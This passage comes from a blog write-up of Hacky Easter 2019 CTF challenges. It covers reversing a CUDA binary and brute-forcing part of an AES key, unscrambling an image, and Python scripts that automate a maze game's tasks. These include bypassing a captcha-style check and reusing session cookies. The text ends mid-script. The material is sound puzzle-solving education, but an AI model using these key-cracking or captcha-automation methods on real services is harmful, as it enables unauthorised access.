64bit\n\n\tcode for sm_30\n\nFatbin elf code:\n================\narch = sm_30\ncode version = &#x5B;1,7]\nproducer = cuda\nhost = linux\ncompile_size = 64bit\n\n\tcode for sm_30\n\t\tFunction : _Z3f13PhS_PjS_i\n\t.headerflags    @&quot;EF_CUDA_SM30 EF_CUDA_PTX_SM(EF_CUDA_SM30)&quot;\n                                                                     \/* 0x22f2c28232423307 *\/\n        \/*0008*\/                   MOV R1, c&#x5B;0x0]&#x5B;0x44];             \/* 0x2800400110005de4 *\/\n        \/*0010*\/                   S2R R0, SR_CTAID.X;               \/* 0x2c00000094001c04 *\/\n        \/*0018*\/                   S2R R2, SR_TID.X;                 \/* 0x2c00000084009c04 *\/\n        \/*0020*\/                   IMUL R0, R0, c&#x5B;0x0]&#x5B;0x28];        \/* 0x50004000a0001ca3 *\/\n        \/*0028*\/                   IADD R3, -R2, RZ;                 \/* 0x48000000fc20de03 *\/\n        \/*0030*\/                   ISETP.NE.AND P0, PT, R0, R3, PT;  \/* 0x1a8e00000c01dc23 *\/\n        \/*0038*\/               @P0 EXIT;                             \/* 0x80000000000001e7 *\/\n                                                                     \/* 0x2232304230428047 *\/\n        \/*0048*\/                   MOV R2, c&#x5B;0x0]&#x5B;0x150];            \/* 0x2800400540009de4 *\/\n        \/*0050*\/                   MOV R3, c&#x5B;0x0]&#x5B;0x154];            \/* 0x280040055000dde4 *\/\n        \/*0058*\/                   LD.E R0, &#x5B;R2];                    \/* 0x8400000000201c85 *\/\n        \/*0060*\/                   MOV R16, c&#x5B;0x0]&#x5B;0x158];           \/* 0x2800400560041de4 *\/\n        \/*0068*\/                   LD.E R5, &#x5B;R2+0x4];                \/* 0x8400000010215c85 *\/\n        \/*0070*\/                   MOV R17, c&#x5B;0x0]&#x5B;0x15c];           \/* 0x2800400570045de4 *\/\n        \/*0078*\/                   LD.E R6, &#x5B;R2+0x8];                \/* 0x8400000020219c85 *\/\n                                                                     \/* 0x2232323232323047 *\/\n        \/*0088*\/                   LD.E R7, &#x5B;R2+0xc];                \/* 0x840000003021dc85 *\/\n        \/*0090*\/                   MOV R15, c&#x5B;0x0]&#x5B;0x14c];           \/* 0x280040053003dde4 *\/\n        \/*0098*\/                   LD.E R10, &#x5B;R2+0x18];              \/* 0x8400000060229c85 *\/\n        \/*00a0*\/                   LD.E R11, &#x5B;R2+0x1c];              \/* 0x840000007022dc85 *\/\n        \/*00a8*\/                   LD.E R12, &#x5B;R2+0x20];              \/* 0x8400000080231c85 *\/\n        \/*00b0*\/                   LD.E R13, &#x5B;R2+0x24];              \/* 0x8400000090235c85 *\/\n        \/*00b8*\/                   LD.E R8, &#x5B;R2+0x10];               \/* 0x8400000040221c85 *\/\n                                                                     \/* 0x22b04230427043f7 *\/\n        \/*00c8*\/                   LD.E R9, &#x5B;R2+0x14];               \/* 0x8400000050225c85 *\/\n        \/*00d0*\/                   LOP32I.XOR R4, R0, 0xdeadbeef;    \/* 0x3b7ab6fbbc011c82 *\/\n        \/*00d8*\/                   MOV32I R0, 0xffffff00;            \/* 0x1bfffffc00001de2 *\/\n        \/*00e0*\/                   LOP32I.XOR R5, R5, 0xdeadbeef;    \/* 0x3b7ab6fbbc515c82 *\/\n        \/*00e8*\/                   LOP32I.XOR R6, R6, 0xdeadbeef;    \/* 0x3b7ab6fbbc619c82 *\/\n        \/*00f0*\/                   ST.E &#x5B;R2], R4;                    \/* 0x9400000000211c85 *\/\n        \/*00f8*\/                   LOP32I.XOR R7, R7, 0xdeadbeef;    \/* 0x3b7ab6fbbc71dc82 *\/\n                                                                     \/* 0x2272304230423047 *\/\n        \/*0108*\/                   LOP32I.XOR R11, R11, 0xdeadbeef;  \/* 0x3b7ab6fbbcb2dc82 *\/\n        \/*0110*\/                   LOP32I.XOR R12, R12, 0xdeadbeef;  \/* 0x3b7ab6fbbcc31c82 *\/\n        \/*0118*\/                   LOP32I.XOR R4, R10, 0xdeadbeef;   \/* 0x3b7ab6fbbca11c82 *\/\n        \/*0120*\/                   LOP32I.XOR R13, R13, 0xdeadbeef;  \/* 0x3b7ab6fbbcd35c82 *\/\n        \/*0128*\/                   ST.E &#x5B;R2+0x4], R5;                \/* 0x9400000010215c85 *\/\n        \/*0130*\/                   LOP32I.XOR R14, R8, 0xdeadbeef;   \/* 0x3b7ab6fbbc839c82 *\/\n        \/*0138*\/                   LOP32I.XOR R9, R9, 0xdeadbeef;    \/* 0x3b7ab6fbbc925c82 *\/\n...\n<\/pre><\/div>\n<br\/>What followed were a lot of assembly. Nevertheless I started to reverse every function step by step. Though suddenly, I recognized a few similarities to the AES WhiteBox from <a href=\"#chlg14\">egg14<\/a>. Could this possibly be AES?\n<br\/>\n<br\/>The string which seems to be decrypted and is written to the file <code>egg<\/code> is called <code>v10<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00403760]&gt; pc @ obj.v10\n#define _BUFFER_SIZE 256\nconst uint8_t buffer&#x5B;256] = {\n  0x71, 0x31, 0xad, 0x54, 0xef, 0x04, 0xdb, 0xa5, 0x03, 0x30,\n  0x0c, 0x0f, 0xf7, 0xbd, 0x83, 0x8e, 0xb1, 0xcd, 0x89, 0xc5,\n  0x6f, 0x8a, 0x0e, 0x6b, 0xb3, 0x18, 0xc1, 0xd5, 0xc6, 0x5c,\n  0x44, 0x1a, 0xa2, 0x80, 0xb7, 0xc1, 0xe1, 0x9a, 0x6f, 0xba,\n  0x4f, 0x11, 0x03, 0xb8, 0x1e, 0xbc, 0x8d, 0xe3, 0xf2, 0x99,\n...\n<\/pre><\/div>\n<br\/>So let&#8217;s try to decrypt this string with AES and an arbitrary key we choose:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg19# python\nPython 2.7.15+ (default, Feb  3 2019, 13:13:16)\n&#x5B;GCC 8.2.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; from Crypto.Cipher import AES\n&gt;&gt;&gt; key = &#039;testtesttesttest&#039;\n&gt;&gt;&gt; cipher = AES.new(key, AES.MODE_ECB)\n&gt;&gt;&gt; v10 = &#039;\\x71\\x31\\xad\\x54\\xef\\x04\\xdb\\xa5\\x03\\x30\\x0c\\x0f\\xf7\\xbd\\x83\\x8e&#039;\n&gt;&gt;&gt; cipher.decrypt(v10).encode(&#039;hex&#039;)\n&#039;24d2b45ee0fa357d13508450b634e5d5&#039;\n<\/pre><\/div>\n<br\/>And now let&#8217;s use the same key for the program:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ .\/coumpactdiasc\nEnter Password: testtesttesttest\n<\/pre><\/div>\n<br\/>And compare the result stored in the file <code>egg<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ hexdump -C egg | head -n 1\n00000000  24 d2 b4 5e e0 fa 35 7d  13 50 84 50 b6 34 e5 d5  |$..^..5}.P.P.4..|\n<\/pre><\/div>\n<br\/>The output is the same. The program simply implements an AES encryption using the given key. This means, that we can use any AES featuring tool in order to find the valid key.\n<br\/>\n<br\/>On the password hint image we can see that the last letters of the password are <code>THCUDA<\/code>. Taking into account english words, which end with the letters <code>TH<\/code>, it seems probable that the password ends with <code>WITHCUDA<\/code>.\n<br\/>\n<br\/>Since the key should be 16 byte, there are 8 bytes left to bruteforce: <code>xxxxxxxxWITHCUDA<\/code>.\n<br\/>\n<br\/>Also we can assume that the resulting file called <code>egg<\/code> should probably be an PNG image. This makes the first 16 bytes of the plain text: <code>89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52<\/code>.\n<br\/>\n<br\/>Taking all this into account we can use this very good AES bruteforcing tool: <a href=\"https:\/\/github.com\/sebastien-riou\/aes-brute-force\" target=\"_new\" rel=\"noopener noreferrer\">aes-brute-force<\/a>.\n<br\/>\n<br\/>We have to provide:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>a key mask (we only want to bruteforce the first 8 bytes: <code>FFFFFFFF_FFFFFFFF_00000000_00000000<\/code>)<\/li><li>the parts of the key we know (<code>...WITHCUDA<\/code>: <code>00000000_00000000_57495448_43554441<\/code>)<\/li><li>the plain text we expect (<code>89504E47_0D0A1A0A_0000000D_49484452<\/code>)<\/li><li>the cipher text to be used (<code>7131AD54_EF04DBA5_03300C0F_F7BD838E<\/code>)<\/li><li>the charset for the key (since the key until know only contains uppercase letters: <code>65 - 90<\/code>)<\/li><\/ul>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:\/opt\/aes-brute-force$ .\/aes-brute-force FFFFFFFF_FFFFFFFF_00000000_00000000 00000000_00000000_57495448_43554441 89504E47_0D0A1A0A_0000000D_49484452 7131AD54_EF04DBA5_03300C0F_F7BD838E 65 90\nINFO: 12 concurrent threads supported in hardware.\n\nSearch parameters:\n\tn_threads:    12\n\tkey_mask:     FFFFFFFF_FFFFFFFF_00000000_00000000\n\tkey_in:       00000000_00000000_57495448_43554441\n\tplain:        89504E47_0D0A1A0A_0000000D_49484452\n\tcipher:       7131AD54_EF04DBA5_03300C0F_F7BD838E\n\tbyte_min:     0x41\n\tbyte_max:     0x5A\n\n\tjobs_key_mask:00FFFFFF_FFFFFFFF_00000000_00000000\n\nLaunching 64 bits search\n\nThread 0 claims to have found the key\n\tkey found:    41455343_5241434B_57495448_43554441\n\nPerformances:\n\t91463133065 AES128 operations done in 942.856s\n\t10ns per AES128 operation\n\t97.01 million keys per second\n<\/pre><\/div>\n<br\/>The tool successfully bruteforced the key: <code>41455343_5241434B_57495448_43554441<\/code>. Converting this to ASCII:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&gt;&gt;&gt; &#039;41455343_5241434B_57495448_43554441&#039;.replace(&#039;_&#039;,&#039;&#039;).decode(&#039;hex&#039;)\n&#039;AESCRACKWITHCUDA&#039;\n<\/pre><\/div>\n<br\/>&#8230; reveals, that the key is <code>AESCRACKWITHCUDA<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ .\/coumpactdiasc\nEnter Password: AESCRACKWITHCUDA\n\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ file egg\negg: PNG image data, 480 x 480, 8-bit\/color RGBA, non-interlaced\n<\/pre><\/div>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg19_03.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-NUSm-dv5t-thFy-XVMV<\/span>.\n<br\/>\n<h1 id=\"chlg20\">20 &#8211; Scrambled Egg<\/h1>\nThe challenge provides the following image:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg20_01.png\" \/>\n<br\/>\n<br\/>Obviously we have to <i>unscramble<\/i> the image in order to restore the egg. The challenge here was rather to find out <b>what<\/b> needs to be done than how this can be done.\n<br\/>\n<br\/>The first thing, which felt a little bit odd, is the solution of the image:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [20]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg20# exiftool egg.png\nExifTool Version Number         : 11.16\nFile Name                       : egg.png\nDirectory                       : .\nFile Size                       : 60 kB\nFile Modification Date\/Time     : 2019:01:14 02:00:04-05:00\nFile Access Date\/Time           : 2019:06:03 04:18:22-04:00\nFile Inode Change Date\/Time     : 2019:06:03 04:18:22-04:00\nFile Permissions                : rw-r--r--\nFile Type                       : PNG\nFile Type Extension             : png\nMIME Type                       : image\/png\nImage Width                     : 259\nImage Height                    : 256\nBit Depth                       : 8\nColor Type                      : RGB with Alpha\nCompression                     : Deflate\/Inflate\nFilter                          : Adaptive\nInterlace                       : Noninterlaced\nImage Size                      : 259x256\nMegapixels                      : 0.066\n<\/pre><\/div>\n<br\/>The solution is <code>259x256<\/code>. Lately this will make sense.\n<br\/>\n<br\/>I started by writing a python script, which prints out all pixel values line by line:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nfrom PIL import Image\n\nimg = Image.open(&#039;egg.png&#039;)\npix = img.load()\n\nfor h in range(img.size&#x5B;1]):\n  for w in range(img.size&#x5B;0]):\n    p = pix&#x5B;w,h]\n    print(p)\n\n<\/pre><\/div>\n<br\/>Browsing through the output in each line of the image three odd pixels can be recognized:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [15,25,36]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg20# .\/inspect.py\n(1, 1, 207, 255)\n(1, 1, 207, 255)\n(1, 1, 207, 255)\n(1, 1, 205, 255)\n(1, 1, 205, 255)\n(1, 1, 205, 255)\n(1, 1, 205, 255)\n(1, 1, 205, 255)\n(1, 1, 205, 255)\n(1, 1, 203, 255)\n(1, 1, 203, 255)\n(1, 1, 203, 255)\n(1, 1, 203, 255)\n(0, 23, 0, 0)\n(1, 1, 201, 255)\n(1, 1, 201, 255)\n(1, 1, 201, 255)\n(1, 1, 201, 255)\n(1, 1, 201, 255)\n(1, 1, 199, 255)\n(1, 1, 199, 255)\n(1, 1, 199, 255)\n(1, 1, 199, 255)\n(23, 0, 0, 0)\n(1, 1, 199, 255)\n(1, 1, 199, 255)\n(1, 1, 199, 255)\n...\n(233, 197, 1, 255)\n(233, 197, 1, 255)\n(233, 197, 1, 255)\n(233, 197, 1, 255)\n(233, 195, 1, 255)\n(233, 195, 1, 255)\n(0, 0, 23, 0)\n...\n<\/pre><\/div>\n<br\/>Each line of the image contains three pixels, which alpha value is <code>0<\/code>. Only one other value (<code>R<\/code>, <code>G<\/code> or <code>B<\/code>) is set. The others are also <code>0<\/code>. The one value, which is not zero, seems to be a predefined value per line of the image:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg20# .\/inspect.py | grep &#039;0)&#039;\n(0, 23, 0, 0)\n(23, 0, 0, 0)\n(0, 0, 23, 0)\n(0, 214, 0, 0)\n(214, 0, 0, 0)\n(0, 0, 214, 0)\n(0, 0, 175, 0)\n(0, 175, 0, 0)\n(175, 0, 0, 0)\n(223, 0, 0, 0)\n(0, 223, 0, 0)\n(0, 0, 223, 0)\n(0, 53, 0, 0)\n(53, 0, 0, 0)\n(0, 0, 53, 0)\n(0, 0, 46, 0)\n(46, 0, 0, 0)\n...\n<\/pre><\/div>\n<br\/>After thinking about those pixels a while, I assumed that the specific value of one line determine, where this line of the image should actually be. This would mean, that we just have to reorder the lines:\n<br\/>\n<br\/>Before:\n<br\/>\n<br\/><code>[--- line 23 ---]\n<br\/>[--- line 214 ---]\n<br\/>[--- line 175 ---]\n<br\/>[--- line 223 ---]\n<br\/>[--- line 53 ---]\n<br\/>...<\/code>\n<br\/>\n<br\/>Afterwards:\n<br\/>\n<br\/><code>[--- line 1 ---]\n<br\/>[--- line 2 ---]\n<br\/>[--- line 3 ---]\n<br\/>[--- line 4 ---]\n<br\/>[--- line 5 ---]\n<br\/>...<\/code>\n<br\/>\n<br\/>The harder part was to figure out, how the colors within a single line of the images were mixed up. By comparing the RGB-values with the values of a valid red egg, it seemed to me that the channels (<code>RGB<\/code>) have been shifted.\n<br\/>\n<br\/>Also, the three pixels within each line are always at a different position. And only one value (<code>R<\/code>, <code>G<\/code> or <code>B<\/code>) is actually set. Now this make sense! The position of the pixel within a line determine how many position the channel has been shifted. For example a shift could look like this:\n<br\/>\n<br\/><code>R: [4 5 6 7 8 9 0 1 2 3 ...]\n<br\/>G: [1 2 3 4 5 6 7 8 9 0 ...]\n<br\/>B: [7 8 9 0 1 2 3 4 5 6 ...]<\/code>\n<br\/>\n<br\/>Thus we have to revert the shifting:\n<br\/>\n<br\/><code>R: [0 1 2 3 4 5 6 7 8 9 ...]\n<br\/>G: [0 1 2 3 4 5 6 7 8 9 ...]\n<br\/>B: [0 1 2 3 4 5 6 7 8 9 ...]<\/code>\n<br\/>\n<br\/>The following python script carries out both of the mentioned steps:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nfrom PIL import Image\n\nimg = Image.open(&#039;egg.png&#039;)\npix = img.load()\n\nline_map = {}\n\nfor h in range(img.size&#x5B;1]):\n  r=&#x5B;]; g=&#x5B;]; b=&#x5B;]\n  r_idx=0; g_idx=0; b_idx=0;\n  line_num=0\n  for w in range(img.size&#x5B;0]):\n    p = pix&#x5B;w,h]\n    if (p&#x5B;3] == 0):\n      # special pixel\n      line_num = p&#x5B;0]+p&#x5B;1]+p&#x5B;2]\n      if (p&#x5B;0] &gt; 0)  : r_idx = w\n      elif (p&#x5B;1] &gt; 0): g_idx = w\n      elif (p&#x5B;2] &gt; 0): b_idx = w\n    else:\n      r.append(p&#x5B;0])\n      g.append(p&#x5B;1])\n      b.append(p&#x5B;2])\n\n  # processed one line of the image\n  line_map&#x5B;line_num] = &#x5B;]\n  for i in range(256):\n    line_map&#x5B;line_num].append( (r&#x5B;(i+r_idx)%256], g&#x5B;(i+g_idx)%256], b&#x5B;(i+b_idx)%256]) )\n\n# reorder lines\nnew_pixels = &#x5B;]\nfor i in range(256): new_pixels += line_map&#x5B;i]\n\nimg_new = Image.new(&#039;RGB&#039;, (256, 256))\nimg_new.putdata(new_pixels)\nimg_new.save(&#039;egg_out.png&#039;)\n<\/pre><\/div>\n<br\/>Running the script:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg20# .\/unscrambleEgg.py\n<\/pre><\/div>\n<br\/>&#8230; creates a new file <code>egg_out.png<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg20_02.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-NUSm-dv5t-thFy-XVMV<\/span>.\n<br\/>\n<h1 id=\"chlg21\">21 &#8211; The Hunt: Misty Jungle<\/h1>\nAfter choosing the path <code>Misty-Jungle<\/code> on the challenge website, the first relevant information can be found here:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_01.png\" width=\"800\"\/>\n<br\/>\n<br\/>It turned out that the string is simply rotated by <code>1<\/code>. Thus we can subtract <code>1<\/code> from each character to gain the original string:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n&#x5B;GCC 8.3.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; s = &#039;``bqq`vsm``0npwf0y0z&#039;\n&gt;&gt;&gt; r = &#039;&#039;\n&gt;&gt;&gt; for c in s: r += chr(ord(c)-1)\n...\n&gt;&gt;&gt; r\n&#039;__app_url__\/move\/x\/y&#039;\n<\/pre><\/div>\n<br\/>\n<br\/>Accordingly the string is <code>__app_url__\/move\/x\/y<\/code>, which tells us how we can move.\n<br\/>\n<br\/>After clicking on <code>I'm ready!<\/code> we get to the following page:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_02.png\" width=\"600\"\/>\n<br\/>\n<br\/>Knowing how to move we can for example append <code>\/move\/1\/0<\/code> to the URL in order to move to the right:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_03.png\" width=\"600\"\/>\n<br\/>\n<br\/>There is obviously a wall at the right side of us. Moving to the top (<code>\/move\/0\/-1<\/code>) does work, though:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_04.png\" width=\"600\"\/>\n<br\/>\n<br\/>In order to expose all walls of the maze, I wrote the following python script:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nimport requests\nimport readchar\n\ndef move(s,d):\n  if (d == &#039;d&#039;): url_d = &#039;1\/0&#039;\n  elif (d == &#039;a&#039;): url_d = &#039;-1\/0&#039;\n  elif (d == &#039;w&#039;): url_d = &#039;0\/-1&#039;\n  elif (d == &#039;s&#039;): url_d = &#039;0\/1&#039;\n  return s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/move\/&#039;+url_d)\n\ndef dirToCoord(d):\n  if (d == &#039;d&#039;): return (1,0)\n  elif (d == &#039;a&#039;): return (-1,0)\n  elif (d == &#039;w&#039;): return (0,-1)\n  elif (d == &#039;s&#039;): return (0,1)\n\ndef printField(f):\n  for i in range(SIZE-1):\n    for j in range(SIZE-1):\n      print(f&#x5B;j]&#x5B;i]),\n    print(&#039;&#039;)\n  saveField(f, SIZE)\n\ndef loadField(f):\n  try:\n    lines = open(&#039;field_&#039;+str(SIZE)+&#039;.txt&#039;).read().split(&#039;\\n&#039;)\n    i = 0\n    lines = lines&#x5B;:-1]\n    for line in lines:\n      line = line&#x5B;:-1]\n      j = 0\n      for val in line.split(&#039;,&#039;):\n        if (val != &#039;o&#039;):\n          f&#x5B;i]&#x5B;j] = val\n        j += 1\n      i += 1\n  except: pass\n\ndef saveField(f, s):\n  pFile = open(&#039;field_&#039;+str(SIZE)+&#039;.txt&#039;,&#039;w&#039;)\n  for i in range(SIZE-1):\n    line = &#039;&#039;\n    for j in range(SIZE-1):\n      line += str(f&#x5B;i]&#x5B;j])+&#039;,&#039;\n    pFile.write(line&#x5B;:-1]+&#039;\\n&#039;)\n  pFile.close()\n\n\n\ns = requests.Session()\n\ns.get(&#039;http:\/\/whale.hacking-lab.com:5337\/1804161a0dabfdcd26f7370136e0f766&#039;)\ns.get(&#039;http:\/\/whale.hacking-lab.com:5337\/&#039;)\n\nfield = &#x5B;]\nSIZE = 57\n\n\nfor i in range(SIZE-1):\n  field.append(&#x5B;])\n  for j in range(SIZE-1):\n    field&#x5B;i].append(&#039; &#039;)\n\ncurp = (len(field)\/2,len(field)\/2)\n\nloadField(field)\nfield&#x5B;curp&#x5B;0]]&#x5B;curp&#x5B;1]] = &#039;o&#039;\nprintField(field)\n\nwhile True:\n  while True:\n    direction = readchar.readchar()\n    if (direction == &#039;x&#039;): quit()\n    if (direction == &#039;p&#039;): print(s.cookies.get_dict())\n    if (direction in &#039;wasd&#039;): break\n  resp = move(s, direction).text\n  dtc = dirToCoord(direction)\n  if (&#039;Ouch! You would hit a wall.&#039; in resp):\n    field&#x5B;curp&#x5B;0]+dtc&#x5B;0]]&#x5B;curp&#x5B;1]+dtc&#x5B;1]] = &#039;X&#039;\n  else:\n    field&#x5B;curp&#x5B;0]]&#x5B;curp&#x5B;1]] = &#039; &#039;\n    curp = (curp&#x5B;0] + dtc&#x5B;0], curp&#x5B;1] + dtc&#x5B;1])\n    field&#x5B;curp&#x5B;0]]&#x5B;curp&#x5B;1]] = &#039;o&#039;\n  printField(field)\n  if (&#039;&lt;h3 style=&quot;margin-bottom:-5px&quot;&gt;&#039; in resp):\n    h3 = resp&#x5B;resp.index(&#039;&lt;h3 style=&quot;margin-bottom:-5px&quot;&gt;&#039;)+4:]\n    h3 = h3&#x5B;:h3.index(&#039;&lt;\/h3&gt;&#039;)]\n    print(&#039;--&gt; &#039; + h3)\n<\/pre><\/div>\n<br\/>\n<br\/>This script can be used to move around in the maze and find walls (<code>Ouch! You would hit a wall.<\/code>) as well as challenges (usually enclosed in a <code>&lt;h3&gt;<\/code> tag). It can also be used to print the current session cookie by pressing <code>p<\/code> in order to use this session within a browser to manually solve a task.\n<br\/>\n<br\/>Based on the output of the script, I created the following map:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_05.png\" width=\"600\"\/>\n<br\/>\n<br\/>One very important aspect of this challenge (also true for <a href=\"#chlg22\">egg22<\/a>) is, that the whole state of the game is stored in the user&#8217;s session cookie. This means that we don&#8217;t have to repeatedly solve the single tasks, but can simply save the session cookie after having solved a task and always use this saved cookie as a starting pointer to solve further tasks. Once we have solved another task, we take this session cookie and proceed with the next task and so forth.\n<br\/>\n<br\/>So let&#8217;s have a look at the single tasks:\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Warmup<\/h3>\n<br\/>This is the very first task, we have to solve:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_06.png\" width=\"700\"\/>\n<br\/>\n<br\/>The picture on the left is a static picture (<code>c11.png<\/code>). The picture on the right is dynamically created and contains a few pixels, which differ from the static image. We only have to find those different pixels:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge11():\n  img1 = Image.open(&#039;c11\/c11.png&#039;)\n  pix1 = img1.load()\n  img2 = Image.open(&#039;c11\/img.png&#039;)\n  pix2 = img2.load()\n\n  res = &#039;&#x5B;&#039;\n  for w in range(img1.size&#x5B;0]):\n    for h in range(img1.size&#x5B;1]):\n      if (pix1&#x5B;w,h] != pix2&#x5B;w,h]):\n        res += &#039;&#x5B;&#039;+str(w)+&#039;,&#039;+str(h)+&#039;], &#039;\n  res = res&#x5B;:-2]+&#039;]&#039;\n  return res\n\nresp = # ... contains html code of task website ...\nfind1 = &#039;&lt;img src=&quot;..\/..\/static\/img\/ch11\/challenges\/&#039;\nimg = resp&#x5B;resp.index(find1)+len(find1):]\nimg = img&#x5B;:img.index(&#039;&quot;&gt;&#039;)]\n# download image!\nimgUrl = &#039;http:\/\/whale.hacking-lab.com:5337\/static\/img\/ch11\/challenges\/&#039;+img\nimgDownload = s.get(imgUrl).content\nf = open(&#039;c11\/img.png&#039;, &#039;w&#039;)\nf.write(imgDownload)\nf.close()\nres = solveChallenge11()\nresp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?pixels=&#039;+res).text\nif (&#039;You solved it!&#039; in resp): print(&#039;solved c11!&#039;)\nelse:\n  print(&#039;failure solving c11&#039;)\n  quit()\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">C0tt0nt4il Ch3ck<\/h3>\n<br\/>This task requires the user to solve 10 equations in time:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_07.png\" width=\"700\"\/>\n<br\/>\n<br\/>This task really took me some time. I figured out that the number of different pictures is quite limited. Thus I wrote a little script, which downloaded all different images and prompted me to manually enter the result. I stored the solution in a text file:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg21\/c12# cat sol.txt\na94e1283-de0c-142-879b-97d5764c4bb0.png,142\n7230c105-78be-77-900d-af88e24804dc.png,77\ne6cd83d0-cf6b-142-8989-489bc9742630.png,142\n3e1785d4-f44f-92-8d4c-d9f9cb6c529d.png,92\n788116b2-591a-107-85c5-c4c273e74ea6.png,107\n0f41dcad-1774-74-970b-257da9e7cc6a.png,74\n11f1a7bd-6e36-71-9003-cdbde3133213.png,71\n487f71d7-57fd-87-bb59-4141ef304261.png,87\n459bb71e-8a2c-5-8ab7-3497476614e4.png,5\n3ea51eb7-b92e-47-b393-6528daa628cd.png,47\n84a604ef-0948-90-96a1-5f8df8c3ad57.png,90\n6b9dbe13-a072-148-bd18-9e25f95bc32a.png,148\n<\/pre><\/div>\n<br\/>\n<br\/>Now this file can be used to automatically solve the 10 equations in time:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nresult_map = {}\nlines = open(&#039;c12\/sol.txt&#039;).read().split(&#039;\\n&#039;)\nfor line in lines:\n  line = line.strip()\n  if (len(line) == 0): continue\n  imgName = line.split(&#039;,&#039;)&#x5B;0]\n  res = line.split(&#039;,&#039;)&#x5B;1]\n  result_map&#x5B;imgName] = res\n\ndef solveChallenge12(s, resp):\n  solvedCnt = 0\n  while True:\n    if (&#039;Your journey ends here.&#039; in resp): return False\n    find1 = &#039;&lt;img id=&quot;captcha&quot; src=&quot;static\/img\/ch12\/challenges\/&#039;\n    img = &#039;&#039;\n    try:\n      img = resp&#x5B;resp.index(find1)+len(find1):]\n    except: break\n    img = img&#x5B;:img.index(&#039;&quot;&gt;&#039;)]\n    if (img in 